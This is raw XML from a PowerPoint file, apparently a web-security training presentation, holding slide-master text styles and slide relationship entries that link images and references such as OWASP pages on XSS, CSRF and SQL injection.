      <a:lvl3pPr marL="1506361" marR="0" indent="-617361" algn="l" defTabSz="821531" latinLnBrk="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="5900"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClrTx/>
        <a:buSzPct val="75000"/>
        <a:buFontTx/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr b="0" baseline="0" cap="none" i="0" spc="0" strike="noStrike" sz="5000" u="none">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1950861" marR="0" indent="-617361" algn="l" defTabSz="821531" latinLnBrk="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="5900"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClrTx/>
        <a:buSzPct val="75000"/>
        <a:buFontTx/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr b="0" baseline="0" cap="none" i="0" spc="0" strike="noStrike" sz="5000" u="none">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2395361" marR="0" indent="-617361" algn="l" defTabSz="821531" latinLnBrk="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="5900"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClrTx/>
        <a:buSzPct val="75000"/>
        <a:buFontTx/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr b="0" baseline="0" cap="none" i="0" spc="0" strike="noStrike" sz="5000" u="none">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2839861" marR="0" indent="-617361" algn="l" defTabSz="821531" latinLnBrk="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="5900"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClrTx/>
        <a:buSzPct val="75000"/>
        <a:buFontTx/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr b="0" baseline="0" cap="none" i="0" spc="0" strike="noStrike" sz="5000" u="none">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="3284361" marR="0" indent="-617361" algn="l" defTabSz="821531" latinLnBrk="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="5900"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClrTx/>
        <a:buSzPct val="75000"/>
        <a:buFontTx/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr b="0" baseline="0" cap="none" i="0" spc="0" strike="noStrike" sz="5000" u="none">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3728861" marR="0" indent="-617361" algn="l" defTabSz="821531" latinLnBrk="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="5900"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClrTx/>
        <a:buSzPct val="75000"/>
        <a:buFontTx/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr b="0" baseline="0" cap="none" i="0" spc="0" strike="noStrike" sz="5000" u="none">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="4173361" marR="0" indent="-617361" algn="l" defTabSz="821531" latinLnBrk="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="5900"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClrTx/>
        <a:buSzPct val="75000"/>
        <a:buFontTx/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr b="0" baseline="0" cap="none" i="0" spc="0" strike="noStrike" sz="5000" u="none">
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Helvetica"/>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jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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2.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hyperlink" Target="https://gist.github.com/maxvt/bb49a6c7243163b8120625fc8ae3f3cd" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.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21.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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39.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.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23.jpeg"/><Relationship Id="rId4"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jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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24.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/jamesarosen/478db5faef370eac43fb" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rorsecurity.info/portfolio/xss-protection-in-haml-templates" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.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2.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2.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2.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hyperlink" Target="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developers.google.com/web/fundamentals/security/csp/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Content_Security_Policy" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.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25.jpeg"/><Relationship Id="rId4"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26.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4"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image" Target="../media/image45.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.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7.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2.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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9.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2.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2.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2.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.veracode.com/blog/managing-appsec/when-rails-protectfromforgery-fails" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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2.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2.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tinfoilsecurity.com/blog/tags/clickjacking" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.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9.xml"/><Relationship Id="rId3"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2.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hyperlink" Target="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cross-site_request_forgery" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.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27.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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hyperlink" Target="https://pagerduty.pagerduty.com" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.pn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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hooli.pagerduty.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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2.pn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2.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hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.rapid7.com/2017/06/15/about-user-enumeration/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.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28.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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2.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2.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56.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.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2.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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.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2.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2.png"/></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29.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide16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2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide16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2.png"/></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2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide16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2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide16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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://martinfowler.com/articles/session-secret.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide16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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide17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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide17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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide17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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide17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hyperlink" Target="https://www.owasp.org/index.php/Session_Management_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.browserauth.net/channel-bound-cookies" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.ietf.org/html/draft-west-origin-cookies-01" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.ietf.org/html/rfc5929" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide17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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.jpeg"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide17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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide17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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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61.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide18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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide18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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.jpeg"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide18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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide18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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide18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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2015/08/how-security-flaws-work-the-buffer-overflow/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide18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6.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64.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2015/08/how-security-flaws-work-the-buffer-overflow/" TargetMode="External"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide18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7.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65.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2015/08/how-security-flaws-work-the-buffer-overflow/" TargetMode="External"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide18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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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hyperlink" Target="https://arstechnica.com/information-technology/2015/08/how-security-flaws-work-the-buffer-overflow/" TargetMode="External"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide18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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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0.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide19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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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hyperlink" Target="https://arstechnica.com/information-technology/2015/08/how-security-flaws-work-the-buffer-overflow/" TargetMode="External"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide19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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://phrack.org/issues/49/14.html#article" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide19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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rubyzip/rubyzip/issues/315" TargetMode="External"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide19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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=FKXOucXB4a8" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide19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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=FKXOucXB4a8" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide19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hyperlink" Target="https://en.wikipedia.org/wiki/Data_Encryption_Standard#NSA's_involvement_in_the_design" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://simson.net/ref/1994/coppersmith94.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Differential_cryptanalysis" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Power_analysis" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nsa.gov/news-features/declassified-documents/cryptologic-histories/assets/files/cold_war_iii.pdf" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.theregister.co.uk/2001/01/25/directv_attacks_hacked_smart_cards/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide19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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide19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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.jpeg"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide19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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide19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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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jpeg"/><Relationship Id="rId5"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2.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide20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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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hyperlink" Target="https://xkcd.com/327/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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hyperlink" Target="https://beta.companieshouse.gov.uk/company/10542519" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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2.jpeg"/><Relationship Id="rId5"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9.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hyperlink" Target="https://en.wikipedia.org/wiki/Prepared_statement" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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19.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pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjection.net/time-based/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Blind_SQL_Injection" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 